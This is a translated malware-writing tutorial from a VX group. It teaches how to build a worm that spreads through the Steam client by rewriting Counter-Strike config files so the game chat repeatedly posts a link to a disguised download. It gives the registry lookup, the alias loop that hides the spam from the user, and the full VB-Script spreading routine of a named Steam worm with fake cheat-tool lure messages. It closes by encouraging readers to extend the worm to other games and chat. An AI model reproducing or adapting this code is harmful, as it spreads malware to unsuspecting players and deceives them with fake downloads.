|| Author: sk0r,Czybik/EOF || Back to articles ||
||Spreading
||via
||Steam client
||______________________________________
------------------------------------------
+-----------------------------------------+
|1: What is Steam? |+
|2: About this tutorial |+
|3: Explanation about this way to spread |+
|4: Example code in VB-Script |+
|5: The first Steam worms |+
|6: Final words |+
|7: About me |+
+-----------------------------------------++
+++++++++++++++++++++++++++++++++++++++++++
+-----------------------------------------------------+
|Author: sk0r/Czybik |+
|Translated by: SkyOut |+
+-----------------------------------------------------++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+-----------------------------------------------------+
|www.sk0r-czybik.de.vu |+
|www.eof-project.net |+
+-----------------------------------------------------++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
________________________________________________________________________________
=================
|1: What is Steam?|
=================
The Steam client is a program, which is used to play several online games, like
famous games including Counter-Strike 1.6, Half-Life, Half-Life 2, Counter-Strike:
Source, Day of Defeat etc...). Because of so many people using Steam, especially
Counter-Strike 1.6 it's a very good way to spread. Steam always has the same folder
structure and the path is contained in the Registry. Millions of people are using
it, in Germany and the world, which makes it interesting for malware.
How can a worm spread via Steam? It's similar to the way IM-worms (Instant Messenger)
spread, normally IM-worms send links to all contact in ICQ or MSN. The same with
Steam. We send links in the InGame chat with a special time delay. So in its structure,
Steam worms are IM-worms ;)
======================
|2: About this tutorial|
======================
This tutorial was originally written by sk0r/Czybik in 2006.
Why did i write this tutorial? Because of the millions of people using this client,
(even in Germany). So I decided to start coding a Steam worm. The first worm, coded
in VB-Script was not able to spread via Steam, my third worm was able to do so. So,
if you start coding a new worm with many spreading functions, why not code one for
Steam, too? ;)
=======================================
|3: Explanation about this way to spread|
=======================================
OK, now I will explain how you can make your worm spread via Steam. I will explain
this in general, not language specific, so everyone can understand and use it. In
next chapter you will find a code example in VB-Script. Let's go:
First we have to make sure Steam is really installed on the system, therefore you
can check the following Registry key:
+-------------------------------------------------------------------------+
| |
|HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\InstallPath |
| |
+-------------------------------------------------------------------------+
It is a REG_SZ value, also called string. Just make some simple IF-Function to
check whether the key exists or not. If yes, you can be sure Steam is installed
and you have the path to the Steam folder ;)
Now we want to make the worm spread via Counter-Strike 1.6. If you understand how
to do this it is easy for you to code own functions to spread over other games, too.
Just do it over some IF-Functions. So, now you have the Steam path in a variable,
the next we get are one or more folders, named after the account names the user
is containing. Write some functions to check every folder in SteamApps for a folder
named like:
+-----------------------------------------------------------+
| |
|VariableName + "\counter-strike\cstrike" |
| |
+-----------------------------------------------------------+
If you find such a folder, Counter-Strike 1.6 is installed on the system. Now we
come to the part, where you have to manipulate the config file to paste the link
to the worm into the chat. Therefore we must use the Userconfig.cfg. Check if the
file really exists, if not, just create one. The big advantage about this file is,
that it gets executed by steam InGame. You could also try to manipulate the Autoexec.cfg,
Valve.rc or Config.cfg, but be sure to make the Config.cfg "readonly". Another way
would be to make another config file, which will be started by Userconfig.cfg, the
command would look like this:
+-------------------------------------+
| |
|exec "ConfigName.cfg"; |
| |
+-------------------------------------+
Just add this string to the end of the Userconfig.cfg, it won't be easy to recognize.
Now, what do we need to write into the config file to spread our worm?
Therefore we need a Sleep-Command, Say-Command and so called "aliases". The Sleep-Command
is just send by "Echo" into the console. Do some function to make this several times
and you have MUCH time. With the Say-Command we paste our link into the InGame chat.
With the Alias-Command we can make a loop. Now the command pasting the link into
the chat, as alias:
+--------------------------------------------------------------------------------------------+
| |
|alias "alString" "say Mit%dem%Tool%koennt%ihr%alle%ownen:%www.link.de/too.zip"; |
| |
+--------------------------------------------------------------------------------------------+
Now the variable "alString" contains the Say-Command. We will need this later for
our loop function. The % signs will be whitespaces in the chat and not be shown like
this. Always use it like this, to be sure all will work. Now our Sleep-Command:
+-------------------------------------------------------------+
| |
|alias "cmdSleep" "echo You%are%infected!"; |
| |
+-------------------------------------------------------------+
The same as the one above, the only difference is, that the sentence is written into
the console. The console is hidden if not activated by the user manually (by pressing
a special key), while playing it is very annoying =). Now lets do some loop function.
We have a little delay before the sentence is written into the chat (names of variables
changed here):
+--------------------------------------------------------------------------------------------------------------------------------+
| |
|alias "SkorWrite" "say http://encryboy.en.funpic.de/Cstrike_Tweaks.zip <= The best Tweak Tool"; alias "SkorSleep" |
|"echo You are infected with Win32.SkorSteamAttacker-A by sk0r (Czybik)"; alias "SkorGo" "SkorAn"; alias "SkorAn" |
|"SkorWrite; alias SkorGo SkorAus"; alias "SkorAus" "SkorSleep; alias SkorGo SkorSchmaus"; alias "SkorSchmaus" |
|"SkorSleep; alias SkorGo SkorLaus"; alias "SkorLaus" "SkorSleep; alias SkorGo SkorKaus"; alias "SkorKaus" |
|"SkorSleep; alias SkorGo SkorSaus"; alias "SkorSaus" "SkorSleep; alias SkorGo SkorBraus"; alias "SkorBraus" |
|"SkorSleep; alias SkorGo SkorXaus"; alias "SkorXaus" "SkorSleep; alias SkorGo SkorZaus"; alias "SkorZaus" |
|"SkorSleep; alias SkorGo SkorAn"; alias "m_pitch" "SkorGo"; |
| |
+--------------------------------------------------------------------------------------------------------------------------------+
This might look quite difficult^^, but it is really easy:
The variable "SkorWrite" is the sentence for the InGame chat, which should spread
our worm. The variable "SkorSleep" write some sentence into the console to sleep. Most
people won't recognize. The variable "SkorGo" is containing the variable starting the loop,
look at the "m_pitch" command. This will executed InGame every 0.5 seconds. That's
why the loop is "on" (german "an" (SkorAn) = "on"). The loop (m_pitch) executes the
"SkorGo" command every 0.5 seconds, therefore we must change the "SkorGo" command every
time, we do this this way: The variable "SkorAn" write the sentence into the InGame chat
and changes the variable "SkorGo" into "SkorAus" (german "aus" = "off"). "SkorAus"
contains our Sleep-Command and could change "SkorGo" into "SkorAn" again. Then the
sentence would be written every 1.5 seconds (if im right ;P) into the InGame chat.
This wouldn't be very good for the user because the chat would be flooded with messages.
Then the admin might kick him or some automated Anti-Spam tool or, which will happen
in most cases, he can't write anything anymore. Therefore we change "SkorAus" into
other commands, to make it "sleep". The last sleep variable changes "SkorGo" to
"SkorAn" again and the sentence will be written into the chat again ;).
See, wasn't that easy :D
If you are able to do all this now, it shouldn't be a problem for you to make
your worm spread over other games, too. The folder structure is always like this:
+-------------------------------------------------------------+
| |
|VariableName + "\%ModName%\%CfgFolder%\ |
| |
+-------------------------------------------------------------+
============================
|4: Example code in VB-Script|
============================
In the following example you see the spreading function of the
Win32.HLLW.Steam.B, also known as Win32.SkorSteam.B, worm:
+-----------------------------------------------------------------------------------------------------------------------------------+
| |
|SteamPath = wshs.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\" & "InstallPath") Randomize: |
|intNumberRandoom = Int(7 * Rnd) + 1 If intNumberRandoom = 1 Then ChatMessage = "World biggest cfg and priv hack |
|summarize!" ElseIf intNumberRandoom = 2 Then ChatMessage = "Download original Xs1cht and Headstyle Rc!!" ElseIf |
|intNumberRandoom = 3 Then ChatMessage = "Orgia Crack v10 working!! Download it and own!" ElseIf |
|intNumberRandoom = 4 Then ChatMessage = "Pixelaimbot v5.2 working (undetectable) downlaod!" ElseIf |
|intNumberRandoom = 5 Then ChatMessage = "Download 1337 Config by Mouz|Jonny (Original, no fake!!)" ElseIf |
|intNumberRandoom = 6 Then ChatMessage = "h4xx0r sound config download! Better then A3D 2.0 (working)" ElseIf |
|intNumberRandoom = 7 Then ChatMessage = "download priv config h4xx0r maker by hirsche! (no fake)" Else |
|ChatMessage = "download private optimizer by z0rr0.. kommt viel mehr an (geht wirklich!!)" End If Set crtSteamVbs = |
|fso.createtextfile(SteamPath + "\SteamApps\sk0rSteamAttacker.vbs", True) With crtSteamVbs .writeline ("Rem |
|Win32/SkorSteamAttacker-A Spreading Script file") .writeline (" ") .writeline ("On Error Resume Next") .writeline ("Set |
|fso = CreateObject(""scripting.filesystemobject"")") .writeline ("Set wshs = CreateObject(""wscript.shell"")") .writeline |
|("SteamPath = wshs.regread(""HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\"" & ""InstallPath"")") .writeline |
|("Set getfldr = fso.getfolder(SteamPath + ""\SteamApps"")") .writeline ("For Each UserAcc In getfldr.subfolders") |
|.writeline ("If fso.folderexists(UserAcc.Path + ""\counter-strike\cstrike"") Then") .writeline ("If Not |
|fso.fileexists(UserAcc.Path + ""\counter-strike\cstrike\userconfig.cfg"") Then") .writeline ("Set usercfg = |
|fso.createtextfile(UserAcc.Path + ""\counter-strike\cstrike\userconfig.cfg"")") .writeline ("usercfg.writeline (""//first |
|created"")") .writeline ("usercfg.Close") .writeline ("End If") .writeline ("Set openusercfg = |
|fso.opentextfile(UserAcc.Path + ""\counter-strike\cstrike\userconfig.cfg"", 2, True)") .writeline ("openusercfg.write |
|(""//Win32.SkorSteamAttacker-A Cs-Script File (Like IM-Worms)"" + vbCrLf)") .writeline ("openusercfg.write |
|(""//==========================================="" + vbCrLf)") .writeline |
|("openusercfg.write (""//Begin Config h4xx0ring:"" + vbCrLf)") .writeline ("openusercfg.write (""alias |
|""""SkorWrite"""" """"say http://encryboy.en.funpic.de/Cstrike_Tweaks.zip <= " + ChatMessage + " """";"" + |
|vbCrLf)") .writeline ("openusercfg.write (""alias """"SkorSleep"""" """"echo You are infected with |
|Win32.SkorSteamAttacker-A by sk0r (Daniel)"""";"" + vbCrLf)") .writeline ("openusercfg.write (""alias |
|""""SkorGo"""" """"SkorAn"""";"" + vbCrLf)") .writeline ("openusercfg.write (""alias """"SkorAn"""" |
|""""SkorWrite; alias SkorGo SkorAus"""";"" + vbCrLf)") .writeline ("openusercfg.write (""alias """"SkorAus"""" |
|""""SkorSleep; alias SkorGo SkorSchmaus"""";"" + vbCrLf)") .writeline ("openusercfg.write (""alias |
|""""SkorSchmaus"""" """"SkorSleep; alias SkorGo SkorLaus"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"SkorLaus"""" """"SkorSleep; alias SkorGo SkorKaus"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"SkorKaus"""" """"SkorSleep; alias SkorGo SkorSaus"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"SkorSaus"""" """"SkorSleep; alias SkorGo SkorBraus"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"SkorBraus"""" """"SkorSleep; alias SkorGo SkorXaus"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"SkorXaus"""" """"SkorSleep; alias SkorGo SkorZaus"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"SkorZaus"""" """"SkorSleep; alias SkorGo SkorAn"""";"" + vbCrLf)") .writeline ("openusercfg.write |
|(""alias """"m_pitch"""" """"SkorGo"""";"" + vbCrLf)") .writeline ("openusercfg.write (""s_enable_a3d;"" + |
|vbCrLf)") .writeline ("openusercfg.write (""s_a3d """"1""""; alias s_a3d;"" + vbCrLf)") .writeline ("openusercfg.write |
|(""rate """"7500"""";"" + vbCrLf)") .writeline ("openusercfg.write (""//End Config h4xx0ring"" + vbCrLf)") |
|.writeline ("openusercfg.write (""//==========================================="" + |
|vbCrLf)") .writeline ("openusercfg.write (""//Win32.SkorSteamAttacker-A Cs-Script File (Like IM-Worms)"" + vbCrLf)") |
|.writeline ("End If") .writeline ("Next") .Close End With wshs.run (SteamPath + "\SteamApps\sk0rSteamAttacker.vbs"), , |
|True fso.deletefile (SteamPath + "\SteamApps\sk0rSteamAttacker.vbs") |
| |
+-----------------------------------------------------------------------------------------------------------------------------------+
========================
|5: The first Steam worms|
========================
The first Steam worms were done by me :D
The first Steam worm, a VB-Script worm, attacked the program and changed Registry
values. This resulted in a long update time before it was possible to play. It
was quite simple and did not spread via Steam. The second Steam worm, also my creation,
attacked Steam a bit harder, I found more things to attack and modify :D. He simulated
a Cfg-Maker. The third one contained many functions to attack Steam. He used everything,
which was known AND it was the first Steam worm also spreading via Steam, InGame
chat, like IM-Worms do.
==============
|6: Final words|
==============
Now you are able to code worms spreading via Steam. Now try to improve this by using
your fantasy. For example make the worm spread over all games or try to find out
how to spread the worm with the Steam chat program "Friends" ;). If you have any
questions about Steam, this tutorial or anything related to this spreading method,
then feel free to contact me, information written below. If you have good suggestions
for new Steam worms, let me know.
===========
|7: About me|
===========
For question about Steam, the spreading method, if you have found something new or
if you just want to show me your Steam worm sources, then you can write an Email
to sk0r1337@gmx.de or write into the guestbook of my homepage, best regards sk0r/Czybik.
Or write to me in IRC: #vxers, #vx-lab and #eof-project @ Undernet